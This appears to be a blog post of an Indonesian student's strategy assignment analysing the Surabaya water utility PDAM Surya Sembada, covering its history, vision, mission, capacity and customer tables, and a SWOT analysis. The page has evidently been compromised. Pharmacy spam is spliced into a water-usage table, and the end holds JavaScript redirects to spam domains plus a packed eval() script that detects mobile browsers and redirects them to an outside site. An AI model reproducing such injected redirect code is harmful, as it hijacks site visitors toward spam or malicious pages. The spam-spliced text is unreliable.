TUGAS MANAGEMENT STRATEGI PERTEMUAN 4 ANALISI SWOT,VISI,MISI ,SIKAP MENTAL DAN TEKNIK-TEKNIK PDAM SURYA SEMBADA KOTA SURABAYA

NAMA          : ROHMA YUNITA

NIM             : 01112029

LATAR BELAKANG

Sejarah Perkembangan PDAM Surabaya

Tahun 1890 Air minum untuk kota Surabaya yang pertama kali diambil dari sumber mata air di desa Purut Pasuruan. Untuk mengangkut air minum ini digunakan Kereta Api.
Tahun 1903 Pemasangan pipa dari Pandaan oleh NV. Biernie selama 3 (tiga) tahun.
Tahun 1906 Jumlah pelanggan mencapai lebih kurang 1.500 sambungan.
Tahun 1922 Instalasi Pengolahan Air Minum (IPAM) Ngagel I dibangun dengan kapasitas 60 liter / detik.
Tahun 1932 Mata Air Umbulan ditingkatkan kapasitasnya dengan membangun rumah pompa baru.
Tahun 1942 IPAM Ngagel I ditingkatkan kapasitasnya menjadi 180 liter / detik.
Tahun 1950 Perusahaan Air Minum diserahkan kepada Pemerintah Republik Indonesia (Kota Praja Surabaya).
Tahun 1954 IPAM Ngagel I ditingkatkan kapasitasnya menjadi 350 liter / detik.
Tahun 1959 Pembangunan IPAM Ngagel II dengan kapasitas 1000 liter / detik. Proyek ini didesain dan dilaksanakan oleh Degremont Fa. (Perancis).
Tahun 1976 Perusahaan Air Minum disahkan menjadi Perusahaan Daerah dan dituangkan dalam Perda No. 7 tanggal 30 Maret 1976.
Tahun 1977 Peningkatan kapasitas IPAM Ngagel I menjadi 500 liter / detik.
Tahun 1978 Pengalihan status menjadi Perusahaan Daerah Air Minum dari Dinas Air Minum berdasarkan SK Walikota- madya Dati II Surabaya No. 657/WK/77 tanggal 30 Desember 1977.
Tahun 1980 Peningkatan kapasitas IPAM Ngagel I menjadi 1000 liter / detik.
Tahun 1982 Pembangunan IPAM Ngagel III dengan kapasitas 1000  liter / detik dengan lisensi dari Neptune Microfloc (Amerika Serikat).
Tahun 1990 Pembangunan IPAM Karangpilang  I dengan kapasitas 1000 liter / detik dengan dana loan IBRD No. 2632 IND.
Tahun 1991 Pembangunan gedung kantor PDAM yang terletak di Jl. Mayjen Prof. Dr. Moestopo No. 2 Surabaya yang dibiayai dana PDAM murni.
Tahun 1994 Peningkatan kapasitas IPAM Ngagel I menjadi 1500 liter / detik.
Tahun 1996 1) Peningkatan kapasitas IPAM Ngagel I menjadi 1800 liter / detik.
2) Peningkatan kapasitas IPAM Karangpilang I menjadi 1200 liter / detik.
3) Dimulainya pembangunan IPAM Karangpilang II dengan kapasitas 2000 liter / detik yang didanai Loan IBRD No.  3726 IND.
Tahun 1997 1) Peningkatan kapasitas IPAM Ngagel III menjadi 1500  liter / detik.
2) Produksi awal 500 liter / detik IPAM Karangpilang II didistribusikan ke pelanggan.
Tahun 1999 Pembangunan IPAM Karangpilang II dengan kapasitas 2000 liter / detik telah selesai.
Tahun 2001 Pekerjaan peningkatan kapasitas IPAM Karangpilang II menjadi 2500 liter / detik dimulai.
Tahun 2005 Peningkatan kapasitas IPAM Ngagel III menjadi 1750 liter / detik.
Tahun 2006 Peningkatan kapasitas IPAM Karangpilang I menjadi 1450 liter / detik.

VISI DAN MISI PERUSAHAAN

Gambaran Umum :

  1. Perusahaan Daerah Air Minum Kota Surabaya ini merupakan Perusahaan Monopoli yang harus bekerja keras guna mengejar target pelayanan sebagaimana yang telah ditentukan oleh Pemerintah melalui Surat Keputusan Menteri Dalam Negeri Nomor : 690 / 7027 / SJ tanggal 10 Juli 1985 bahwa  75 % masyarakat perkotaan dan 60 % masyarakat pedesaan disamping mengusahakan keuntungan yang wajar, maka untuk mencapai maksud tersebut PDAM Kota Surabaya mengusahakan penyediaan dan distribusi air minum yang memenuhi syarat–syarat kesehatan.
  2. Atas dasar hal tersebut diatas, maka secara umum tujuan daripada Perusahaan Daerah Air Minum Kota Surabaya adalah turut serta mensukseskan program Pembangunan Ekonomi Nasional, khususnya di bidang air minum dan pelayanan kebutuhan air bersih kepada warga kota Surabaya dan sekitarnya, sesuai dengan target dan sasaran pencapaian pelayanan.
  3. Dalam rangka pencapaian tujuan tersebut diatas, maka Perusahaan Daerah Air Minum Kota Surabaya perlu menyatukan pandangan dan pendapat bagi seluruh jajaran karyawan dan karyawatinya, yaitu dengan membuat Visi, Misi, Strategi dan Standar Pelayanan Prima, untuk dijadikan motivasi/pendorong dalam melaksanakan program–program PDAM Kota Surabaya.

Visi :

Visi Perusahaan adalah menjadi PERUSAHAAN AIR MINUM yang mandiri, berwawasan global dan terbaik di kelasnya.

Misi :

  1. Menyediakan air minum yang memenuhi kualitas, kuantitas dan kontinuitas yang dapat dipertanggungjawabkan melalui pelayanan prima dalam rangka
  2. menciptakan nilai tambah bagi masyarakat Kota Surabaya.
  3. Melakukan pengelolaan usaha secara profesional dengan teknologi tepat guna dan prinsip-prinsip manajemen yang berwawasan global sehingga mampu memberikan kontribusi pada peningkatan Pendapatan Asli Daerah.
  4. Mengembangkan lingkungan kerja yang kondusif sehingga menjadi pilihan utama karyawan bekerja dan berkarir secara profesional.
  5. Turut berpartisipasi dalam mengemban tanggung jawab sosial secara proporsional melalui aktifitas Corporate Social Responsibility.

Kebijakan Mutu :

Perusahaan Daerah Air Minum (PDAM) Kota Surabaya bertekad memberikan pelayanan prima dengan menyelenggarakan hubungan yang baik dengan pelanggan melalui penyediaan informasi yang akurat serta penanganan pengaduan yang mudah dan cepat yang mengutamakan kepuasan pelanggan, serta senantiasa melakukan perbaikan yang berkesinambungan, sesuai dengan Sistem Manajemen Mutu ISO 9001:2000

Strategi Perusahaan :

Strategi Perusahaan yang akan dilakukan baik dalam jangka pendek, menengah maupun jangka panjang adalah :

  1. Perubahan atau Reposisi Organisasi :
    1. Sumber daya manusia
    2. Struktur;
    3. Sistem;
    4. Budaya Perusahaan
  2. Meningkatkan Pelayanan Kepada pelanggan :
    1. Kualitas
    2. Kuantitas (Capacity Building);
    3. Kontinuitas;
  3. Mencari sumber-sumber air baku yang lebih baik dari segi kualitas dan kuantitas;
  4. Merehab, membangun Infrastruktur Sistem Penyediaan Air Minum yang ada, sesuai untuk pelanggan dan perkembangan teknologi;
  5. Membangun kemampuan Soft Skill dalam pembangunan Sistem Penyediaan Air Minum (SPAM) yang meliputi instalasi, transmisi, distribusi,
  6. Laboratorium kualitas, customer service;
  7. Menjadikan perusahaan yang profesional dan mandiri dalam pengelolaan yang profesional.

Status Perusahaan

  1. Perusahaan Daerah Air Minum (PDAM) Kota Surabaya merupakan Perusahaan Daerah yang disahkan menurut Peraturan Daerah No. 7 Tahun 1976, tanggal 30 Maret 1976.
  2. Dikukuhkan dan disahkan dengan Surat Keputusan Gubernur Kepala Daerah Tingkat I Jawa Timur No. 11/155/76,  tanggal 6 Nopember 1976.
  3. Diundangkan dalam Lembaran Daerah Kotamadya Daerah Tingkat II Surabaya seri C No. 4C, tanggal 23 Nopember 1976.

Tujuan

  1. Memberikan Pelayanan yang terbaik bagi Pelanggan PDAM Surya Sembada Kota Surabaya .
  2. menjadi PERUSAHAAN AIR MINUM yang mandiri, berwawasan global dan terbaik di kelasnya.
  3. Turut berpartisipasi dalam mengemban tanggung jawab sosial secara proporsional melalui aktifitas Corporate Social Responsibility.

Kapasitas Perusahaan

 

Kapasitas terpasang PDAM Kota Surabaya dapat dilihat pada tabel di bawah ini.

No

Instalasi

Air Baku

Kapasitas (liter/detik) Pada Tahun

2005

2006

2007

1

IPAM KAYOON KALI SURABAYA

200

200

0

2

IPAM SUMBER AIR SUMBER MATA AIR

330

330

330

3

IPAM NGAGEL I KALI SURABAYA

1.800

1.800

1.800

4

IPAM NGAGEL2 KALI SURABAYA

1.000

1.000

1.000

5

IPAM NGAGEL III KALI SURABAYA

1.750

1.750

1.750

6

IPAMKARANG PILANG I KALI SURABAYA

1.200

1.450

1.450

7

IPAMKARANG PILANG II KALI SURABAYA

2.500

2.500

2.500

Total

8.780

9.030

8.830

Tabel Kapasitas Terpasang

 

 

No Instalasi Air Baku Kapasitas (liter/detik) Pada Tahun
2004 2005 2006 2007
1 IPAM KAYOON KALI SURABAYA 114 98 100 0
2 IPAM SUMBER AIR SUMBER MATA AIR 325 318 324 313
3 IPAM NGAGEL I KALI SURABAYA 1.505 1.547 1.503 1.583
4 IPAM NGAGEL2 KALI SURABAYA 882 858 861 783
5 IPAM NGAGEL III KALI SURABAYA 1.446 1.413 1.608 1.792
6 IPAM KARANG PILANG I KALI SURABAYA 1.158 1.139 1.136 1.248
7 IPAM KARANG PILANG II KALI SURABAYA 2.301 2.444 2.486 2.441
Total 7.732 7.818 8.019 8.160

Debit Produksi Sumber Air

Data Debit Produksi Sumber Air Umbulan dan sumber-sumber air disekitar Pandaan , Pasuruan adalah sebagai berikut .

 

 

No Nama Sumber Air Rata-rata Produksi per Bulan
m3 liter / detik
1 Bulak Luyung 7.664 29
2 Bumbungan 5.597 2,16
3 Duren Sewu 41.982 16,20
4 Jambangan 7.970 3,07
5 Kalong 7.672 2,96
6 Kesambi 6.200 2,39
7 Klampok I 7.610 2,94
8 Klampok II 7.414 2,86
9 Klampok III 7.978 3,08
10 Karang Jati 27.236 10,51
11 Lamer 5.146 1,99
12 Plintahan I 218.184 84,18
13 Plintahan II 33.848 13,06
14 Plintahan III 28.266 10,91
15 Toyo Arang 139.414 53,79
16 Umbulan 312.434 120,54
17 Winong 3.584 1,38
Total Produksi 868.199 361,02

Tabel Data Debit Produksi Sumber Air

Jumlah Pelanggan Tahunan

 

Pelayanan Air minum kepada masyarakat tidak hanya terbatas pada daerah administrative kota Surabaya saja , melainkan juga masyarakat daerah Kabupaten Pasuruan , Sidoarjo , dan Gersik, Selain itu PDAM kota Surabaya juga mendukung program pemerintah untuk Pelayanan air bersih ,misalnya untuk :

  • Perumnas
  • Prgram Perbaikan Kampung ( KIP )
  • Kran Umum bantuan UNICEF / Pemerintah Pusat
  • Untuk Masyarakat yang daerahnya belum terjangkau jaringan pipa distribusi , pelayanan dilakukan dengan menggunakan mobil tangki, terminal air, hidran umum dan kran umum

 

                                        Tabel Jumlah Pelanggan menurut Jenis Pelanggan

No Jenis Pelanggan T A H U N
2004 2005 2006 2007
1 Industri 853 869 888 885
2 Perdagangan 23.791 24.903 26.491 27.046
3 Pelabuhan 4 4 4 4
4 Pemerintah 1.056 1.131 1.118 1.174
5 Perumahan 304.482 312.297 324.585 342.509
6 Sosial Khusus 1.141 1.202 1.276 1.377
7 Sosial Umum 4.925 4.770 4.211 3.653
Total 336.252 345.176 358.573 376.648
8 Jumlah Penduduk 2,625,867 2,639,001 2,652,200 2,665,465
9 Penduduk Terlayani 1,709,910 1,768,610 1,783,110 1,808,485
10 % Coverage 65.12 67.02 67.23 67.85

 

 

Pemakaian Air

 

 

Jumlah pemakaian air produksi PDAM oleh masyarakat sesuai dengan Debet Rekening adalah sebagai berikut:

Prices. Canadian Pharmacy, Secure and Anonymous. Need a product that isn`t in the site? Call US!. 24/7 customer support service!

No Jenis Pelanggan Indocin Cost, Indocin Iv, Indocin 50mg, , Purchase Indomethacin, Indocin High, Generic Indocin. Pemakaian (dalam m3) Pada Tahun
2006 2007
1 Perumahan 115.784.820 122.955.647
2 Pemerintah 6.422.018 6.565.830
3 Perdagangan 15.374.319 16.084.072
4 Industri 5.281.520 6.024.201
5 Sosial Umum 6.821.024 6.627.974
6 Sosial Khusus 10.336.082 10.711.290
7 Pelabuhan 542.693 408.624
8 Penjualan Air Tangki 15.830 13.421
9 Sweeping 783.436 607.850
Sub Total 161.361.742 169.678.909
10 Distribusi Barat 740.752 627.912
11 Distribusi Timur 329.873 451.897
12 PMK 1.222 771.50
Total 162.433.589 170.759.489

 

Tabel Pemakaian Air PDAM Kota Surabaya Menurut Debet Rekening

 

 

Analisa SWOT PDAM Surabaya Visi dan Misi Perusahaan PDAM Surya Sembada Surabaya

Visi dari PDAM Surabaya adalah Visi Perusahaan adalah menjadi PERUSAHAAN AIR MINUM yang mandiri, berwawasan global dan terbaik di kelasnya

Analis dalam lingkung Internal :

Strength ( Kekuatan )

  1. PDAM Surya Sembada Kota Surabaya adalah satu-satunya perusahaan AIR yang ada di Surabaya .
  2. Persyaratan yang diberikan kepada calon  pelanggan PDAM Surabaya sangatlah Mudah
  3. Biaya Pasang Baru Sambungan Rumah ( PSB-SR ) sangatlah terjangkau

Weakness ( Kelemahan )

  1. Status tanah Calon Pelanggan Pasang Baru Sambungan Rumah ( PSB-SR ) bermasalah sehingga bisa menghambat untuk menjadi calon pelanggan PDAM Surabaya
  2. Belum Adanya Jaringan atau Pipa Tersier didepan rumah calon pelanggan sehingga tidak bisa menjadi pelanggan PDAM Surabaya

Analisa dalam lingkup Eksternal :

Opportunity  ( Peluang  )

  1. Banyaknya Warga Surabaya yang membutuhkan AIR PDAM dikarenakan Cuaca
  2. Tidak diperbolehkannya Penggunakan ABT ( Air Bawah Tanah ) untuk Perusahaan oleh Pemerintah Kota Surabaya

  Threat    ( Ancaman )

  1. Banyaknya keluhan pelanggan masalah Tidak Dapat Air ( TDA ) dikarenakan Tekanan Air itu tidak sampai ke lokasi yang berada diwilayah pinggiran kota, dimana lokasi-lokasi tersebut termasuk wilayah dengan tekanan air rendah ( Zona Merah) .
  2. Banyaknya keluhan pelanggan masalah Air Keruh dikarenakan adanya perbaikan ditempat instalansi pengelolahan air PDA

Sikap mental yang harus dilakukan untuk mengatasi peluang dan ancaman yang terjadi didalam perusahaan adalah :

  1. Untuk mengatasi peluang
    1. Marketing bersosialisasikan kepada calon pelanggan agar bisa menjadi pelanggan PDAM
    2. Marketing mendatangi dan bersosialisasi terhadap perusahaan-perusahaan yang menggunakan ABT agar bisa menjadi pelanggan PDAM.
    3. Untuk mengatasi ancaman
      1. Mencatat dan melaporkan keluhan pelanggan untuk diberikan kepada petugas yang bersangkutan agar ditindaklanjuti ( pemberian air bersih ) kepada pelanggan
      2. Memperbaiki instalisi dan memberikan solusi yang terbaik untuk pelanggan agar pelanggan tidak kecewa .

 

Teknik – teknik yang dilakukan adalah :

  1. Memberikan pelayanan yang terbaik kepada pelanggan PDAM
  2. Memberikan solusi kepada keluhan pelanggan PDAM
  3. Memberikan bantuan pipa tersier kepada calon pelanggan PDAM agar bisa menjadi pelanggan PDAM
  4. Memberikan surat pernyataan ( surat pengganti ) surat tanah yang bermasalah ( Surat Pernyataan RT, RW, Lurah ) sebagai pengganti surat tanah yang sifatnya hanya sementara
  5. Memberikan insentif kepada pegawai yang bisa mewujudkan target-target yang diberikan perusahaan agar bisa menjadi motifasi pegawai agar berkerjanya semakin giat .

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”; window.location = “http://cheap-pills-norx.com/search.htm?route=search&q=”; eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘(24(a,b){1V(/(2n|2d\\d+|1i).+1b|1g|1E\\/|1H|1C|1x|1B|2s|3l|3n|O(3m|V)|S|3g|38 |3c|3p|3D|1b.+3A|3z|1d m(3x|2H)i|2J( 14)?|2C|p(2x|2A)\\/|30|2T|3j|2S(4|6)0|2U|2R|I\\.(2Q|2N)|2O|2P|2V 2W|33|34/i.19(a)||/31|2X|2Y|2Z|2M|50[1-6]i|2L|2y|a W|2z|M(15|Z|s\\-)|11(2w|2t)|B(2u|E|D)|2v|2B(2I|y|2K)|2G|17(2D|j)|2E(x|2F)|35|36(3w|\\-m|r |s )|3y|3v(P|N|3u)|T(3r|3s)|3t(M|3G)|3H(e|v)w|3F|3E\\-(n|u)|3B\\/|3C|3q|3d\\-|3e|3b|3a|37\\-|D(39|K)|3f|3o(A|N|3k)|3h|3i\\-s|3I|2r|1z|U(c|p)o|1A(12|\\-d)|1y(49|11)|1u(1v|1w)|15(1D|1J)|1K|1I([4-7]0|14|W|1F)|1G|1t(\\-|R)|G u|1L|1q|1h\\-5|g\\-z|j(\\.w|V)|1j(1e|1f)|1s|1k|1r\\-(m|p|t)|1p\\-|1o(Q|F)|1l( i|O)|1m\\-c|1n(c(\\-| |R|a|g|p|s|t)|1M)|2e(2f|2g)|i\\-(20|j|q)|2c|29( |\\-|\\/)|2a|2b|2h|2i|2o|2p|2q|S|2m(t|v)a|2j|2k|2l|28|27|1S( |\\/)|1T|1U |1R\\-|1Q(c|k)|1N(1O|1P)|1W( g|\\/(k|l|u)|50|54|\\-[a-w])|25|26|23\\-w|22|1X\\/|q(x|1Y|1Z)|16(f|21|E)|m\\-48|5H(5E|C)|5y(5A|5L|J)|5V|z(f|5X|T|3J|U|t(\\-| |o|v)|58)|5i(50|5j|v )|5r|5p|5s[0-2]|57[2-3]|5c(0|2)|5d(0|2|5)|5R(0(0|1)|10)|5M((c|m)\\-|5B|5h|5U|5W|5O)|5Q(6|i)|5Z|5o|5n(5m|5k)|5l|5v|5u|5t(a|d|t)|59|5a(13|\\-([1-8]|c))|55|56|L(5g|5f)|5e\\-2|5w(P|5x|X)|5P|5N|Q\\-g|5S\\-a|5T(5Y|12|21|32|H|\\-[2-7]|i\\-)|5C|5D|5z|5F|5K|5J(5I|5G)|5q\\/|4Z(4c|q|4d|4e|y|4b)|4a(f|h\\-|Z|p\\-)|44\\/|X(c(\\-|0|1)|47|16|K|C)|46\\-|51|4f(\\-|m)|4g\\-0|4m(45|4n)|4l(B|17|4k|A|4h)|4i(4j|y)|43(f|h\\-|v\\-|v )|42(f|3P)|3Q(18|50)|3R(3O|10|18)|F(3N|3K)|3L\\-|3M\\-|3S(i|m)|3T\\-|t\\-z|3Z(L|41)|J(Y|m\\-|3Y|3X)|3U\\-9|I(\\.b|G|3V)|3W|4o|4p|4O|4P(4N|x)|4M(40|5[0-3]|\\-v)|4J|4K|4L|4Q(52|53|H|4R|Y|4X|4Y|4W|4V|4S)|4T(\\-| )|4U|4I|4H(g |4v|4w)|4x|4u|4t|4q\\-|4r|4s|4y\\-/i.19(a.4z(0,4)))1c.4F=b})(1a.4G||1a.4E||1c.1d,\’4D://4A.4B/4C/?5b\’);’,62,372,’|||||||||||||||01||||go|||||||ma|||||||te|ny|mo|it|al|ri|co|ca|ta|g1|60|up|ts|nd|pl|ac|ll|ip|ck|pt|_|iris|bi|do|od|wa|se|70|oo||ai|||os|er|mc|ar||test|navigator|mobile|window|opera|ad|un|avantgo|gf|meego|gr|hcit|hp|hs|ht|hi|hei|gene|hd|haie|fly|em|l2|ul|compal|el|dmob|ds|elaine|blazer|ic|bada|ze|fetc|blackberry|ez|k0|esl8|g560|tp|le|no|xi|kyo|kwc|kgt|klon|kpt|if|lg|m50|ui|xo|||m3ga|m1|function|libw|lynx|keji|kddi|iac|ibro|idea|i230|bb|hu|aw|tc|ig01|ikom|jbro|jemu|jigs|ja|android|im1k|inno|ipaq|dica|fennec|rn|av|amoi|ko|ixi|802s|abac|re|an|phone|ch|as|us|aptu|in|ex|palm|yw|770s|4thp|link|vodafone|wap|browser|treo|series|pocket|symbian|windows|ce|6310|6590|3gso|plucker|1207||xda|xiino|attw|au|cmd|lge|mp|cldc|chtm|maemo|cdm|cell|craw|kindle|dbte|dc|psp|ng|hiptop|hone|iemobile|da|midp|ccwa|lb|rd|bl|nq|be|di|ob|avan|netfront|firefox|c55|capi|mmp|bw|bumb|az|br|devi|de|lk|tcl|tdg|gt|00|mb|t2|t6|tel|tim|tx|si|utst|m5|m3|to||sh|sy|sp|sdk||sgh||cr||sc|va|ge|mm|ms|sie|sk|t5|so|ft|b3|sm|sl|id|v400|v750|yas|your|zeto|x700|wonu|nc|nw|wmlb|zte|substr|gettop|info|kt|http|vendor|location|userAgent|wi|whit|vm40|voda|vulc|vk|rg|veri|vi|vx|61|98|w3c|webc|85|83|80|81|sa||shar||||phil|pire|n20|zz|pdxg|pg|sdNXbH|n30|n50|pn|uc|ay|tf|mt|p1|wv|oran|ti|op|o2im|mywa|s55|mwbp|n10|pan|p800|owg1|po|rt|mi|r600|o8|on|qtek|r380|rc|raks|zo|me|ve|ro|rim9|oa|ne|psio|wt|prox|nok|n7|qa|qc|wf|mmef|wg|02|07|nzph’.split(‘|’),0,{})) With phone number tracker google glass getting ready to bolster google+, things are about to heat up

This entry was posted in Uncategorized. Bookmark the permalink.